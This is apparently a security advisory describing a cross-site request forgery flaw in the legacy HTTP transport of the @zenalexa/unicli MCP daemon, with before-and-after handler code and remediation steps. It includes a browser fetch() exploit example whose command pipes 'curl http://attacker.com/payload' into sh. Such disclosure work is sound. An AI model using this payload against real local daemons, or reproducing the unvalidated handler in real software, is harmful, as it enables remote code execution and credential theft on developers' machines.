GHSA-v3f4-w7r7-v3hm: Remote Command Execution via Origin Validation Error in Uni-CLI Legacy HTTP Transport

The Model Context Protocol (MCP) is an open standard designed to facilitate communication between Large Language Model applications and external data sources or local development tools. The @zenalexa/unicli package implements a CLI client and daemon supporting MCP. To enable external applications to interface with local development assets, the CLI exposes an HTTP daemon. This daemon listens on the loopback interface (localhost or 127.0.0.1) and parses incoming requests to trigger system commands.

In versions of @zenalexa/unicli prior to 0.225.2, this daemon included a legacy stateless HTTP transport mechanism. The stateless transport was bound to a loopback port but lacked any checks to verify the source of incoming HTTP connections. This omitted validation created an open attack surface on any workstation running the daemon.

This issue represents a combination of an Origin Validation Error (CWE-346) and Cross-Site Request Forgery (CWE-352). Because browser security boundaries do not block all cross-origin requests to local network services by default, malicious external web pages could send arbitrary instructions to the loopback service. The resulting exploitation could allow unauthenticated command execution under the credentials of the local user running the daemon.

The underlying vulnerability stems from how the legacy stateless HTTP transport processed incoming HTTP request headers. Web browsers implement the Same-Origin Policy (SOP) to isolate resources loaded from different origins. However, the browser SOP allows websites to send Cross-Origin Resource Sharing (CORS) "simple requests" without initiating a preflight OPTIONS handshake. A standard POST request with a Content-Type header set to text/plain qualifies as a simple request, meaning the browser transmits the payload to the local server without checking authorization first.

The Uni-CLI legacy stateless HTTP handler processed all incoming payloads on the /mcp route directly as JSON-RPC instructions. It did not examine the Origin header to ensure the request originated from a trusted client application or the loopback domain. As a result, when the web browser executed the cross-origin request, the loopback daemon parsed and executed the command payload contained in the request body.

This behavior highlights a significant security posture drift within the Uni-CLI code base. The newer Streamable HTTP transport implementation in the same package utilized rigorous routing guards. These guards checked the incoming Origin and restricted communication to explicitly trusted endpoints. The legacy stateless HTTP transport bypassed these middleware validations entirely, maintaining an unauthenticated pathway directly into the core command dispatcher.

The vulnerability was located in the legacy route handler that received incoming stateless JSON-RPC calls. Before the fix in version 0.225.2, the handler processed the HTTP request body directly. It passed the JSON content to the command executor without validating the headers.

// BEFORE: Vulnerable route handling in legacy stateless transport
app.post('/mcp', (req, res) => {
  // Missing check for 'Origin' header allows cross-origin requests
  const payload = JSON.parse(req.body);
  dispatcher.execute(payload)
    .then(result => res.json(result))
    .catch(err => res.status(500).json({ error: err.message }));
});

The remediation resolved this issue by introducing a unified origin-validation middleware. This middleware executes before routing requests for both the legacy and modern transport layers. It inspects the Origin header and rejects any request containing an untrusted domain name.

// AFTER: Patched route handling with global Origin validation middleware
function originGuard(req, res, next) {
  const origin = req.headers['origin'];
  // If the origin header exists and is not loopback, block the request
  if (origin && !isLocalOrigin(origin)) {
    return res.status(403).send('Forbidden: Cross-origin requests are blocked');
  }
  next();
}
 
app.use(originGuard);
app.post('/mcp', (req, res) => {
  const payload = JSON.parse(req.body);
  dispatcher.execute(payload)
    .then(result => res.json(result))
    .catch(err => res.status(500).json({ error: err.message }));
});

This structural fix ensures that standard browser cross-origin requests are terminated at the HTTP entry point. Because non-browser clients (such as local CLI tools) do not attach an Origin header, they continue to work without modification. Only browser-originated requests are evaluated against the strict loopback domain whitelist.

An attacker can exploit this vulnerability by hosting a malicious website and inducing the victim to visit it while the Uni-CLI daemon is running. Because the daemon listens on a predictable loopback port, the malicious website can run background JavaScript to send cross-origin requests to typical local ports.

To bypass the preflight CORS check, the payload is structured as a CORS-simple request. The script sets the Content-Type header to text/plain but embeds a valid JSON-RPC payload in the body. The local daemon receives the text body, parses it as JSON anyway, and executes the contained instructions.

// Example exploit payload running within the victim's browser
fetch('http://localhost:8080/mcp', {
  method: 'POST',
  headers: {
    'Content-Type': 'text/plain'
  },
  body: JSON.stringify({
    jsonrpc: '2.0',
    method: 'tools/call',
    params: {
      name: 'execute_command',
      arguments: {
        cmd: 'curl http://attacker.com/payload | sh'
      }
    },
    id: 1
  })
});

Because the request originates from the local browser running on the victim's workstation, the destination IP address is 127.0.0.1 or localhost. The local operating system forwards the request to the loopback-bound Uni-CLI daemon, which processes the payload as if it came from a trusted local application.

The impact of successful exploitation is critical. By triggering arbitrary tools/call operations, a remote attacker can run arbitrary tools configured in the victim's Uni-CLI instance. These tools often have access to local file systems, secure environment variables, and local command execution capabilities.

Because the command executes on the victim's local machine, the attacker obtains the privilege level of the user running the Uni-CLI daemon. If the developer runs the daemon with administrative privileges or has access to local SSH keys, credentials, or API keys, the attacker can extract these secrets. The remote entity can then pivot into internal corporate resources or cloud environments using the compromised credentials.

The vulnerability receives a CVSS v4.0 score of 8.6, representing high confidentiality and integrity impact with low attack complexity. Although user interaction is required (visiting the malicious page), the attack does not require any prior configuration knowledge or authentication credentials, making it highly reliable once a target visits the site.

The primary remediation strategy is upgrading the @zenalexa/unicli package to version 0.225.2 or later. This update introduces the unified Origin validation middleware which protects the /mcp HTTP endpoint against cross-origin browser requests.

If upgrading is not immediately possible, administrators should disable the legacy stateless HTTP transport. Restricting CLI transport mechanisms to stdio or migrating completely to the secured Streamable HTTP transport mitigates the attack vector. These alternatives do not expose an unauthenticated HTTP endpoint on the loopback interface.

Additionally, firewall configurations or host-based security tools can restrict access to loopback ports. Standard network security practices should ensure that any local service binding to loopback interfaces cannot be accessed by untrusted host processes. Software developers should continuously monitor and align the security postures of all exposed communication channels.